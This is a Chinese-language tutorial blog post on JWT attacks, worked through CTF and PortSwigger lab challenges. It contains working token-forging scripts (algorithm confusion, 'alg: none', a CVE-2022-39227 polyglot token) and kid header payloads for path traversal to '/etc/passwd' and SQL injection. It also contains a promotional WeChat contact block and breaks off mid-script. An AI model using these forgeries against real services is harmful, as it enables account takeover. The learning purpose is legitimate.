前言
在2022祥云杯时遇到有关JWT的题,当时没有思路,对JWT进行学习后来对此进行简单总结,希望能对正在学习JWT的师傅们有所帮助。
JWT
JWT,即JSON WEB TOKEN,它是一种用于通信双方之间传递安全信息的简洁的、URL安全的表述性声明规范,是一种标准化的格式,用于在系统之间发送经过加密签名的JSON数据,理论上可以包含任何类型的数据,但最常用于发送关于用户的信息(“声明”),以进行身份认证、会话处理和访问控制。
简单了解了它的定义后,我们接下来来看一下JWT的组成部分它分为三个部分,如下所示- 1、Headers:头部<br>2、Payload:有效载荷<br>3、Signature:签名
Headers
Headers通常由两部分组成,令牌的类型和签名算法,常见的算法有很多种,例如 HMAC SHA256或 RSA。但它也还有一个kid参数,这是一个可选参数,全称是key ID,它用于指定加密算法的密钥。
示例如下- ewogICJhbGciOiAiSFMyNTYiLAogICJ0eXAiOiAiSldUIgp9
- {<br> "alg": "HS256",<br> "typ": "JWT"<br>}
JWT 作为一个令牌(token),有些场合可能会放到 URL(比如 api.example.com/?token=xxx)。Base64有三个字符+、/和=,在 URL 里面有特殊含义,所以要被替换掉:=被省略、+替换成-,/替换成_ 。这就是 Base64URL 算法。
Payload
有效载荷就是存放有效信息的地方,其中包含声明。声明包含三个部分 1、已注册声明这个部分的话就是已经预先定义过的声明,常见的声明主要有以下几种- iss: jwt签发者<br>sub: jwt所面向的用户<br>aud: 接收jwt的一方<br>exp: jwt的过期时间,这个过期时间必须要大于签发时间<br>nbf: 定义在什么时间之前,该jwt都是不可用的.<br>iat: jwt的签发时间<br>jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击。
示例如下- ewoJInN1YiI6ICJhZG1pbiIsCiAgICAidXNlcl9yb2xlIiA6ICJhZG1pbiIsCiAgICAiaXNzIjogImFkbWluIiwKICAgICJpYXQiOiAxNTczNDQwNTgyLAogICAgImV4cCI6IDE1NzM5NDAyNjcsIAogICAgIm5iZiI6IDE1NzM0NDA1ODIsIAogICAgImp0aSI6ICJkZmY0MjE0MTIxZTgzMDU3NjU1ZTEwYmQ5NzUxZDY1NyIgICAKfQ
- {<br> "sub": "admin", //jwt所面向的用户<br> "user_role" : "admin", //当前登录用户<br> "iss": "admin", //该JWT的签发者,有些是URL<br> "iat": 1573440582, //签发时间<br> "exp": 1573940267, //过期时间<br> "nbf": 1573440582, //该时间之前不接收处理该Token<br> "jti": "dff4214121e83057655e10bd9751d657" //Token唯一标识<br>}
由于头部和有效载荷以明文形式存储,因此,需要使用签名来防止数据被篡改。所以这部分是一个签证信息,这个签证信息由三部分组成- 1、header (base64URL编码)<br>2、payload (base64URL编码)<br>3、secret(密钥)
- Signature=HMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)<br>//假设这里是HS256算法,如果是其他算法的话开头设置为其他算法即可
JWT 攻击
JWT攻击有多种情况,现在来对其进行逐一讲解。
敏感信息泄露
JWT保证的是数据传输过程中的完整性而不是机密性。
因为JWT的payload部分是使用Base64url编码的,所以它其实是相当于明文传输的,当payload中携带了敏感信息时,我们对payload部分进行Base64url解码,就可以读取到payload中携带的敏感信息。
靶场演示
题目链接https://www.ctfhub.com/#/skilltree题目描述如下
JWT 的头部和有效载荷这两部分的数据是以明文形式传输的,如果其中包含了敏感信息的话,就会发生敏感信息泄露。试着找出FLAG。格式为 flag{}
进入环境后发现一个登录框
随便输入账号密码,登录后发现界面如下
查看此时的JWT
[img=720,169.11793855302278]https://img-blog.csdnimg.cn/575278709cab4589add8c63812d61d87.png[/img]
想到题目中说头部和载荷可能会有敏感泄露,将值取出分别进行Base64URL解码
[img=720,142.17391304347825]https://img-blog.csdnimg.cn/92106043a1824fb385fee32193eae6cd.png[/img]
两处拼接一下,得到ctfhub{bb89d985db8cea6a2f2d34cb}
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)
算法修改攻击
首先来简述一下JWT中两个常用的加密算法
HMAC(HS256):是一种对称加密算法,使用秘密密钥对每条消息进行签名和验证RSA(RS256):是一种非对称加密算法,使用私钥加密明文,公钥解密密文。
从上面不难看出,HS256自始至终只有一个密钥,而RS256是有两个密钥的。在通常情况下,HS256的密钥我们是不能取到的,RS256的密钥也是很难获得的,RS256的的公钥相对较容易获取,但无论是HS256加密还是RS256加密,都是无法实现伪造JWT的,但当我们修改RSA256算法为HS256算法时,后端代码会使用公钥作为密钥,然后用HS256算法验证签名,如果我们此时有公钥,那么此时我们就可与实现JWT的伪造。
靶场演示
题目链接https://www.ctfhub.com/#/skilltree
题目描述
有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。
进入环境后发现题目代码- class JWTHelper {<br> public static function encode($payload=array(), $key='', $alg='HS256') {<br> return JWT::encode($payload, $key, $alg);<br> }<br> public static function decode($token, $key, $alg='HS256') {<br> try{<br> $header = JWTHelper::getHeader($token);<br> $algs = array_merge(array($header->alg, $alg));<br> return JWT::decode($token, $key, $algs);<br> } catch(Exception $e){<br> return false;<br> }<br> }<br> public static function getHeader($jwt) {<br> $tks = explode('.', $jwt);<br> list($headb64, $bodyb64, $cryptob64) = $tks;<br> $header = JWT::jsonDecode(JWT::urlsafeB64Decode($headb64));<br> return $header;<br> }<br>}<br><br>$FLAG = getenv("FLAG");<br>$PRIVATE_KEY = file_get_contents("/privatekey.pem");<br>$PUBLIC_KEY = file_get_contents("./publickey.pem");<br><br>if ($_SERVER['REQUEST_METHOD'] === 'POST') {<br> if (!empty($_POST['username']) && !empty($_POST['password'])) {<br> $token = "";<br> if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){<br> $jwt_payload = array(<br> 'username' => $_POST['username'],<br> 'role'=> 'admin',<br> );<br> $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');<br> } else {<br> $jwt_payload = array(<br> 'username' => $_POST['username'],<br> 'role'=> 'guest',<br> );<br> $token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');<br> }<br> @setcookie("token", $token, time()+1800);<br> header("Location: /index.php");<br> exit();<br> } else {<br> @setcookie("token", "");<br> header("Location: /index.php");<br> exit();<br> }<br>} else {<br> if(!empty($_COOKIE['token']) && JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) {<br> $obj = JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY);<br> if ($obj->role === 'admin') {<br> echo $FLAG;<br> }<br> } else {<br> show_source(__FILE__);<br> }<br>}<br>?>
简单的看一下,大致意思就是当以用户名为admin,密码不是$flag时,此时登录后JWT中payload的role是guest,而只有当role为admin时才能够得到Flag,所以我们这里肯定是需要伪造JWT的,我们先以admin为用户名,随便输入密码登录一下此时得到JWT,将其拿去解密网站https://jwt.io解密一下
[img=720,555.6388415672914]https://img-blog.csdnimg.cn/5782695e21cf4b9ab14b514e3e67ac8f.png[/img]
发现加密方式是RS256非对称加密,想到在登录时,下方给出了公钥
[img=720,119.33701657458563]https://img-blog.csdnimg.cn/1126e92edf774aa59cf7aff9b3bcc9eb.png[/img]
所以这里就可以尝试更改算法为HS256,以公钥作为密钥来进行签名和验证,因此我们构造一个伪造JWT的脚本,内容如下- import jwt<br>import base64<br><br>public ="""-----BEGIN PUBLIC KEY-----<br>MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqizf1rnxqfeyCAp52TQO<br>3uEyeB1HzqqbO8FBHWqLlhgmyPFqaopXVhZryzP+Sd6a3iQd8xeD7URswPHE4roA<br>kbI1GMta9zAdD1yPtp//JNZ55hx1iFY2n9gw2u8VL64n9sCc56H46L3W52Z37kvW<br>q5LuoLAuyJpP7Ofadt7biWaeXibZGQjPwlbCy31DyxdDFCt8pVrajVI97w3amHBU<br>Xhd0Ku+DOq9hjadtQbTkbIkAUR84yqt+25EXd/rg1w8we9ysNcTjAeUayRGPuQmX<br>UWJaFpsvuL7WeUb2xJqvieFwsCQppS1ZgaoRc0F835K+G3s3qWRi4AnvZxryfTzl<br>awIDAQAB<br>-----END PUBLIC KEY-----<br>"""<br>payload={ "username": "admin","role": "admin"}<br>print(jwt.encode(payload, key=public, algorithm='HS256'))
[img=720,135.3146853146853]https://img-blog.csdnimg.cn/d267f4e5d53d4ddb975aa82d8ade13ed.png[/img]
这个是因为源代码中进行了校验,我们简单设置一下即可,源代码文件地址如下- /usr/lib/python3/dist-packages/jwt/algorithms.py
此时保存退出,再运行文件即可得到新JWT
[img=720,51.52804642166344]https://img-blog.csdnimg.cn/5c0d4d06fc1f43de99ca552cf43b3b6e.png[/img]
将新的JWT拿到网站中替换旧的JWT,刷新网站即可得到flag
[img=720,210.78758949880668]https://img-blog.csdnimg.cn/b463460a0c554ceab36af618145cf1bb.png[/img]
未验证签名
当用户端提交请求给应用程序,服务端可能没有对token签名进行校验,这样,攻击者便可以通过提供无效签名简单地绕过安全机制,此时就造成了越权漏洞的出现。假设现有payload如下- { <br> "iat": 1668871293,<br> "exp": 1668878493,<br> "nbf": 1668871293,<br> "sub": "quan9i",<br>}
- { <br> "iat": 1668871293,<br> "exp": 1668878493,<br> "nbf": 1668871293,<br> "sub": "admin",<br>}
靶场演示
题目环境https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature题目描述
本实验使用基于 JWT 的机制来处理会话。由于实施缺陷,服务器不会验证它收到的任何 JWT 的签名。
题目要求
要解决实验室问题,请修改您的会话令牌以获取对管理面板的访问权限/admin,然后删除用户carlos。
题目条件
您可以使用以下凭据登录到您自己的帐户:wiener:peter
打开环境后发现Cookie中没什么东西,但想到题目给出了账号,那就先找登录点,发现有个My account
[img=720,331.47385103011095]https://img-blog.csdnimg.cn/52ffdb0c2ce24391a28462d3ae290eb7.png[/img]
点击查看,发现是登录界面,将刚刚题目条件中所给的用户名和密码放入
[img=720,207.56756756756758]https://img-blog.csdnimg.cn/e797b483bcb949548d9355d45b097fd4.png[/img]
此时查看cookie
[img=720,190.78864353312304]https://img-blog.csdnimg.cn/cc5dfe9a3a41451289b357f6b79531ec.png[/img]
具体内容为- eyJraWQiOiIxYmE5NjA0Ny0wNjBiLTQ0MTAtODg1NC01YWYxYTQ2ZTljYWEiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTI5NzgxMH0.JMb3Ttl7WLoVrTfcEq03VIafh7zDMu5_nhMtPc3qnhgENSl1WbMAMFfeTa-v0jS69A13W-J3_ccslHu25OW_SRPAq2GuAUoFfEGtthnP-PaDWFN2_UIIcaeAx8rj8bNy65apX37EnTx-sPo274XjW9hQgTRLT1ifHtfihvTzoOY94_2bLaR4JwSUoyoi_kXZW4IndvhqpHA2kn8jw2aQOJCCCjeHh2r_CDDQA1hrSKeP2FgIq07wagLZqzkG6ATexINTNI_4jwpO8Jy1U-l0voPQQ6g111GCkBDhhkCagnm4zh-_Kl2nDD-Xjp74VVZDCNojbLoeS2Y6RGPZ4GR28w
- {"iss":"portswigger","sub":"wiener","exp":1669297810}
- {"iss":"portswigger","sub":"administrator","exp":1669297810}
[img=720,180.9]https://img-blog.csdnimg.cn/e47f58e51b1c41b5a97a0156aa0abbd1.png[/img]
发现可以删除用户
[img=720,174.44933920704847]https://img-blog.csdnimg.cn/99cd09dbe26346cf9df045e94d698d8d.png[/img]
任务完成。
[img=720,177.22177091795288]https://img-blog.csdnimg.cn/31d29030dcdd44c1b8affa828bc9fe2b.png[/img]
空加密算法
这里需要先介绍一些利用的知识点
将signature置空。利用node的jsonwentoken库已知缺陷:当jwt的signature为null或undefined时,jsonwebtoken会采用algorithm为none进行验证
JWT支持使用空加密算法,可以在header中指定alg为none,此时只要把signature设置为空,提交到服务器,任何token都可以通过服务器的验证。
假设现有JWT(解码后的,无signature的)如下- {<br> "alg" : "Hs256",<br> "typ" : "jwt"<br>}<br><br>{<br> "user" : "quan9i"<br>}
- {<br> "alg" : "None",<br> "typ" : "jwt"<br>}<br><br>{<br> "user" : "admin"<br>}
靶场演示
靶场环境https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification题目描述
本实验使用基于 JWT 的机制来处理会话。服务器未安全地配置为接受未签名的 JWT。
题目要求
要解决实验室问题,请修改您的会话令牌以获取对管理面板的访问权限/admin,然后删除用户carlos。
题目条件
您可以使用以下凭据登录到您自己的帐户:wiener:peter
进入环境后先去登录
[img=720,356.9534555712271]https://img-blog.csdnimg.cn/faa63c8af5304a92b41ee75e3e9ac6c1.png[/img]
得到JWT,题目提示了接受未签名的JWT,所以将第二个点后的内容直接删除,而后再对前面内容进行Base64解码- {"kid":"16adc077-c753-4bbe-a9df-46688c01ac46","alg":"RS256"}.{"iss":"portswigger","sub":"wiener","exp":1669304815}.
[img=720,214.15599534342257]https://img-blog.csdnimg.cn/69030d4d002340f6a8c1ccac0582ed21.png[/img]
点进去发现有删除用户的功能
[img=720,166.84870848708488]https://img-blog.csdnimg.cn/dfdd2ae211d546d1b52d03c573aadf51.png[/img]
任务完成。
[img=720,173.35384615384615]https://img-blog.csdnimg.cn/913d067da48645cc86542d580d04faa7.png[/img]
爆破密钥
这个的话其实就是使用工具来对密钥进行爆破,从而实现越权。这个的话在参考过其他师傅的文章后发现是有一些条件的,具体如下所示- 1、JWT使用的加密算法是HS256加密算法<br>2、一段有效的、已签名的token<br>3、签名用的密钥不复杂(弱密钥)
- 1、git clone https://github.com/brendan-rius/c-jwt-cracker #下载<br>2、make #编译
这是一个,还有一个爆破工具,可以引用字典,链接如下https://github.com/Sjord/jwtcrack安装方式如下所示- 1、git clone https://github.com/Sjord/jwtcrack <br>2、pip install PyJWT tqdm
- python3 crackjwt.py JWT dictionary.txt //字典文件是自己写入的
题目描述
本实验使用基于 JWT 的机制来处理会话。它使用极弱的密钥来签署和验证令牌。这可以很容易地使用一个包含常见secret的单词表来暴力破解。
题目要求
要解决实验室问题,请首先暴力破解网站的密钥。获得此后,使用它签署修改后的会话令牌,使您可以访问管理面板/admin,然后删除用户carlos
题目条件
您可以使用以下凭据登录到您自己的帐户:wiener:peter
进入环境后,依旧是先登录获取当前JWT
[img=720,320.55415617128466]https://img-blog.csdnimg.cn/5d9d18c4e3fd470095610ff48f4fc728.png[/img]
因为题目已经提示了这里用的是暴力破解,所以我们用刚刚提到的工具,来爆破一下密钥- ./jwtcrack eyJraWQiOiIyZjRlMzM0Yy1lMzZjLTRhNWQtOWVjYi03ZDhkZDJhYThlYjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTMwNzYwNn0.iMBR0rqiUQKT1a1YoonpXNY5hCNz16okJB9tbog0QRE
这里爆破多次均未得到密钥,所以我们选择换另一个工具,自己找个字典来进行爆破字典链接https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list接下来使用工具指定字典来进行爆破- python3 crackjwt.py eyJraWQiOiIyZjRlMzM0Yy1lMzZjLTRhNWQtOWVjYi03ZDhkZDJhYThlYjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2OTMwNzYwNn0.iMBR0rqiUQKT1a1YoonpXNY5hCNz16okJB9tbog0QRE dictionary.txt
得到密钥为secret1进入解码网站https://jwt.io,对jwt进行解码[img=720,366.40776699029124]https://img-blog.csdnimg.cn/ba5a27c1bce14d7884c9182b062b56e4.png[/img]
修改payload中的sub为administrator,再在下方写入密钥secret1,生成新JWT[img=720,353.5764158262219]https://img-blog.csdnimg.cn/ba47bbb1b07240f7891f9cf5125b3ad1.png[/img]
拿到网站中替换原JWT,发现新功能点
[img=720,222.20689655172413]https://img-blog.csdnimg.cn/793aa155e32f44d6a5c823caf5bb3308.png[/img]
访问后发现可以删除用户
[img=720,369.4029850746269]https://img-blog.csdnimg.cn/254ea596c4b4426fbe8ef84087f45d49.png[/img]
任务完成。
[img=720,201.9512195121951]https://img-blog.csdnimg.cn/c2e6f1f7d055485fb32dd69dea892c46.png[/img]
Kid参数注入
前文在简述Headers提到,它还有一个可选参数kid,当Headers中存在这个参数时,我们可以通过修改这个参数实现目录遍历、SQL注入等攻击- #目录遍历<br>{<br> "kid" : "/etc/passwd"<br>}
- #sql注入<br>{<br> "kid" : "0 union select 123"<br>}
靶场演示
靶场地址https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal题目描述
本实验使用基于 JWT 的机制来处理会话。为了验证签名,服务器使用JWTkid标头中的参数从其文件系统中获取相关密钥
题目要求
要解决实验室问题,请伪造一个 JWT,使您可以访问管理面板/admin,然后删除用户carlos。
题目条件
您可以使用以下凭据登录到您自己的帐户:wiener:peter
进入环境后,登录获取JWT安装插件
[img=720,325.4961832061069]https://img-blog.csdnimg.cn/b5af8a0ca9004f58996582e0bec75454.png[/img]
安装后选择New Symmetric Key,生成一个Key
接下来修改K参数为AA==,点击确认抓靶场的包
[img=720,643.9154616240266]https://img-blog.csdnimg.cn/c6e6c8f8b5af445281371005f099008e.png[/img]
点击下面的sign
将此时的JWT去替换网站的JWT,再刷新网站
[img=720,214.44976076555025]https://img-blog.csdnimg.cn/2208bd69b1f0409e8405f2008a30223c.png[/img]
成功越权
[img=720,245.64705882352942]https://img-blog.csdnimg.cn/833aae8f6bd546aa83a62ec2956980f8.png[/img]
简单说一下这里的原理:这里其实就是利用了kid的目录遍历攻击,我们将kid参数指向标准文件/dev/null,此时我们再利用bp的工具设置一个空的签名密钥,就实现了越权,成功得到管理员权限。
同时,这个Kid是Headers的一部分,Headers其实还有两个不常用的参数,即Jwk和Jku,这两个的话也是存在漏洞的,他们的攻击方式同Kid是较为相似的,所以这里不再去演示如何攻击。靶场环境如下,有兴趣的师傅可以看看。https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injectionhttps://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection
JWT攻击实例
CVE-2022-39227
这个的话并没有给出具体的POC,但是官方在commit中最下方给出了测试代码https://github.com/davedoesdev/python-jwt/commit/88ad9e67c53aa5f7c43ec4aa52ed34b7930068c9具体代码如下所示- """ Test claim forgery vulnerability fix """<br>from datetime import timedelta<br>from json import loads, dumps<br>from test.common import generated_keys<br>from test import python_jwt as jwt<br>from pyvows import Vows, expect<br>from jwcrypto.common import base64url_decode, base64url_encode<br><br>@Vows.batch<br>class ForgedClaims(Vows.Context):<br> """ Check we get an error when payload is forged using mix of compact and JSON formats """<br> def topic(self):<br> """ Generate token """<br> payload = {'sub': 'alice'}<br> return jwt.generate_jwt(payload, generated_keys['PS256'], 'PS256', timedelta(minutes=60))<br><br> class PolyglotToken(Vows.Context):<br> """ Make a forged token """<br> def topic(self, topic):<br> """ Use mix of JSON and compact format to insert forged claims including long expiration """<br> [header, payload, signature] = topic.split('.')<br> parsed_payload = loads(base64url_decode(payload))<br> parsed_payload['sub'] = 'bob'<br> parsed_payload['exp'] = 2000000000<br> fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))<br> return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'<br><br> class Verify(Vows.Context):<br> """ Check the forged token fails to verify """<br> @Vows.capture_error<br> def topic(self, topic):<br> """ Verify the forged token """<br> return jwt.verify_jwt(topic, generated_keys['PS256'], ['PS256'])<br><br> def token_should_not_verify(self, r):<br> """ Check the token doesn't verify due to mixed format being detected """<br> expect(r).to_be_an_error()<br> expect(str(r)).to_equal('invalid JWT format')
- def topic(self, topic):<br> """ Use mix of JSON and compact format to insert forged claims including long expiration """<br> [header, payload, signature] = topic.split('.')<br> parsed_payload = loads(base64url_decode(payload))<br> parsed_payload['sub'] = 'bob'<br> parsed_payload['exp'] = 2000000000<br> fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))<br> return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
- {" header.fake_payload.":"","protected":"header", "payload":"payload","signature":"signature"}
那么这个漏洞是如何产生的呢?接下来我们看一下源文件。查看python_jwt/__init__.py文件
[img=720,471.3178294573643]https://img-blog.csdnimg.cn/6d3db09afdb54c8bb833892101d607ef.png[/img]
首先看到 header, claims, _ = jwt.split('.'),它按.进行拆分,如何分别将三部分赋值给headers,claims以及_。接下来就是对头部进行解码,而后检验头部算法,后面也是校验属性的,接下来走到JWS这里- if pub_key: #验证是否传入密钥<br> token = JWS()<br> token.allowed_algs = allowed_algs<br> token.deserialize(jwt, pub_key) # 传入整个用户的JWT,JWS对JWT进行反序列化处理<br> parsed_claims = json_decode(token.payload) # JWS对传入部分进行json解码
[img=720,475.17857142857144]https://img-blog.csdnimg.cn/ff7ca7e6864548c087a66f1496a2cd77.png[/img]
这里的话就是首先尝试对传入的JWT进行解析,我们知道这里传入的是完整的原始JWT,而非拆分后的某个部分,JWT的格式是xxx.yyy.zzz这种,而json能解析的是{"a":1,"b":2,"c":3,"d":4,"e":5}这种格式的,所以它无疑会走向except ValueError这里,然后它对值进行拆分,分别赋给protected、payload和signature,然后就将o赋值给了self.objects,这里的话还有一个verify(key,alg)函数,我们跟进一下
这里可以看到它其实是对JWT的各部分内容进行了一个检验,它这里检验的是原来的完整的JWT,所以这个肯定是没有问题的,这个验证肯定是可以通过的。
我们此时回到__init__.py
[img=720,610.1343570057581]https://img-blog.csdnimg.cn/15d371bce2e44a5ab63d4b2b6a81f358.png[/img]
发现这里在校验过后,后面都没有再用到token这个,后面是对header和claims中的一些参数进行校验,然后将parsed_header和parsed_claims值返回了。这里就是问题所在, 在对整个JWT进行校验过后,没有返回校验过的数据,而是返回一开始进行点分过后的数据。
我们的恶意payload如下所示
[img=600,222.42152466367713]https://img-blog.csdnimg.cn/bce679b9c98f4361ad5a948594356b67.png[/img]
此时拆分后他一直在校验的是后面的灰色部分,这部分是原始的JWT,校验肯定是可以通过的,而我们最终返回的数据是前面的forged_payload,所以无论前面怎么添加,怎么替换,校验都是可以通过的。此时你再去看官方给出的测试代码就可以理解它的思路了。
CTF实战
CTFshow系列
Web345
打开靶场,进入环境
[img=720,399.61267605633805]https://img-blog.csdnimg.cn/70f1fb991d374a1b812a547b61a0e078.png[/img]
看一下源代码
[img=720,155.33527696793004]https://img-blog.csdnimg.cn/7c3d6e7d4a4e4047ac86c73aeba8f505.png[/img]
提示了admin界面,先记着。同时刚刚发现cookie含有JWT,放入网站https://jwt.io/中查看一下
[img=720,459.6021699819168]https://img-blog.csdnimg.cn/812bb7f70bcc4b518159343c74cdb05e.png[/img]
加密方式为空加密,所以这里的话,我们base64解码一下,然后直接修改sub为admin,再进行base64编码,放入cookie中即可,接下来访问admin界面
[img=720,526.8484187568157]https://img-blog.csdnimg.cn/839983716ff94934a5b3e1b6c0e06572.png[/img]
web346
这里进入环境后,接下来进入靶场,看一下JWT,用解密网站解密一下
[img=720,443.8569880823402]https://img-blog.csdnimg.cn/8e491fe8fb594e88969736025538186d.png[/img]
发现有了加密格式,然后这里存在一种漏洞就是可以把加密方式换成空加密来绕过,但是这个网站是不能直接修改的,我们这里可以借助python脚本实现,脚本如下所示- import time<br>import jwt<br><br># payload<br>token_dict={<br> "iss": "admin",<br> "iat": 1668871293,<br> "exp": 1668878493,<br> "nbf": 1668871293,<br> "sub": "admin",<br> "jti": "9892b9d99098ba229891bedcfa856b61"<br>}<br><br># headers<br>headers = {<br> "alg": "none",<br> "typ": "JWT"<br>}<br><br>jwt_token = jwt.encode(token_dict, # payload, 有效载体 <br> key='',<br> headers=headers, # json web token 数据结构包含两部分, payload(有效载体), headers(标头)<br> algorithm="none", # 指明签名算法方式, 默认也是HS256<br> ) # python3 编码后得到 bytes, 再进行解码(指明解码的格式), 得到一个str<br><br>print(jwt_token)<br>
注:这里安装jwt模块的时候,安装的模块是PyJWT模块,同时不要给脚本名字命名为jwt.py,否则运行脚本时就会发生报错。
[img=720,582.1276595744681]https://img-blog.csdnimg.cn/d86ebffc78b441f1b008b057f5119379.png[/img]
接下来运行脚本
[img=720,357.2373081463991]https://img-blog.csdnimg.cn/2ef70249dc2641d28cccafe16863c7aa.png[/img]
得到JWT- eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTY2ODg3MTI5MywiZXhwIjoxNjY4ODc4NDkzLCJuYmYiOjE2Njg4NzEyOTMsInN1YiI6ImFkbWluIiwianRpIjoiOTg5MmI5ZDk5MDk4YmEyMjk4OTFiZWRjZmE4NTZiNjEifQ.
[img=720,512.2622950819672]https://img-blog.csdnimg.cn/3ecdf083c0a849d0a2f223d1597cfd5a.png[/img]
Web347
提示弱口令,这里应该说的是密钥,先记着进入环境后找到JWT去对应网站解码
[img=720,418.61842105263156]https://img-blog.csdnimg.cn/10291561aedf4ed7bb36dcc388031769.png[/img]
HS256加密方式,我们这里的话需要猜解一下密钥,然后修改才有效,既然提示了弱口令,那就可以试试123456这种,修改sub为admin,得到新JWT后去靶场中修改JWT,然后访问admin界面
[img=720,262.5503355704698]https://img-blog.csdnimg.cn/cb1bb25b33f34e5fa6b9f0f8a067b8e7.png[/img]
Web348
[img=720,206.4064602960969]https://img-blog.csdnimg.cn/edd84516dfdb41109248a822c810f8ef.png[/img]
题目提示爆破,这里就需要先介绍一个爆破工具了,链接如下https://github.com/brendan-rius/c-jwt-cracker安装方式也很简单- 1、git clone https://github.com/brendan-rius/c-jwt-cracker #下载<br>2、make #编译
- 3、./jwtcrack JWT #使用
[img=720,84.56100342075257]https://img-blog.csdnimg.cn/fc1181e1ac2b44eab8c637ef15ddd6df.png[/img]
爆破出密钥为aaab,接下来方法就同上,在解码网站中,修改sub为admin,同时添加密钥为aaab,然后拿着得到的新JWT,去替换网站的JWT,再去访问admin界面即可。
[img=720,305.4267515923567]https://img-blog.csdnimg.cn/816f1e86c2114fad8245176fc267f18d.png[/img]
Web349
题目给了一个附件,内容如下- /* GET home page. */<br>router.get('/', function(req, res, next) {<br> res.type('html');<br> var privateKey = fs.readFileSync(process.cwd()+'//public//private.key');<br> var token = jwt.sign({ user: 'user' }, privateKey, { algorithm: 'RS256' });<br> res.cookie('auth',token);<br> res.end('where is flag?');<br> <br>});<br> <br>router.post('/',function(req,res,next){<br> var flag="flag_here";<br> res.type('html');<br> var auth = req.cookies.auth;<br> var cert = fs.readFileSync(process.cwd()+'//public/public.key'); // get public key<br> jwt.verify(auth, cert, function(err, decoded) {<br> if(decoded.user==='admin'){<br> res.end(flag);<br> }else{<br> res.end('you are not admin');<br> }<br> });<br>});
- import jwt<br>public = open('private.key', 'r').read()<br>payload={"user":"admin"}<br>print(jwt.encode(payload, key=public, algorithm='RS256'))
接下来替换JWT,然后post访问
[img=720,563.84]https://img-blog.csdnimg.cn/de3449314dcb4793968080d9f14dfad1.png[/img]
web350
题目给了附件,在里面发现公钥
[img=720,263.8105975197294]https://img-blog.csdnimg.cn/32a99d67a71f49db9137e6292ac32483.png[/img]
这里的话应该考察的就是算法修改攻击,然后我们这里修改算法为HS256,而后用公钥加密,脚本如下- const jwt = require('jsonwebtoken');<br>var fs = require('fs');<br>var privateKey = fs.readFileSync('public.key');<br>var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });<br>console.log(token)
[img=720,213.0841121495327]https://img-blog.csdnimg.cn/a8009de6dfc14509a871d2457e5a0387.png[/img]
得到JWT后替换一下,然后post发包即可获取flag
[img=720,398.8965517241379]https://img-blog.csdnimg.cn/37afbbaa566e4ee882fe29e852e0bb88.png[/img]
[祥云杯2022]FunWeb
注:因为这道题没有复现环境了,所以我这里的部分图片是来源于网上,参考的是X1r0z大师傅的https://exp10it.cn/
[img=720,461.4765100671141]https://img-blog.csdnimg.cn/1a8fa69d0463404eb6d7eabe970aed05.png[/img]
进入环境后是个注册界面,接下来随便注册账号后进行登录
[img=720,164.53125]https://img-blog.csdnimg.cn/12d103d781994c478b46df20a1e7610a.png[/img]
发现上方是有两个功能点的
[img=720,486.45441815204236]https://img-blog.csdnimg.cn/5f799137e34443f6bed2e788fa639093.jpeg[/img]
抓获取成绩包后发现这里提示no admin同时发现JWT,想到这里可能需要伪造JWT,JWT最近新出的漏洞是CVE-2022-39227。那么我们就可以尝试用这个漏洞来进行伪造JWT,伪造JWT脚本如下所示- from datetime import timedelta<br>from json import loads, dumps<br>from jwcrypto.common import base64url_decode, base64url_encode<br><br>def topic(topic):<br> """ Use mix of JSON and compact format to insert forged claims including long expiration """<br> [header, payload, signature] = topic.split('.')#点分<br> parsed_payload = loads(base64url_decode(payload))#解码<br> parsed_payload['is_admin'] = 1#伪造<br> fake_payload = base64url_encode((dumps(parsed_payload, separators=(',', ':'))))#编码<br> return '{" ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'#生成恶意载荷<br>token = 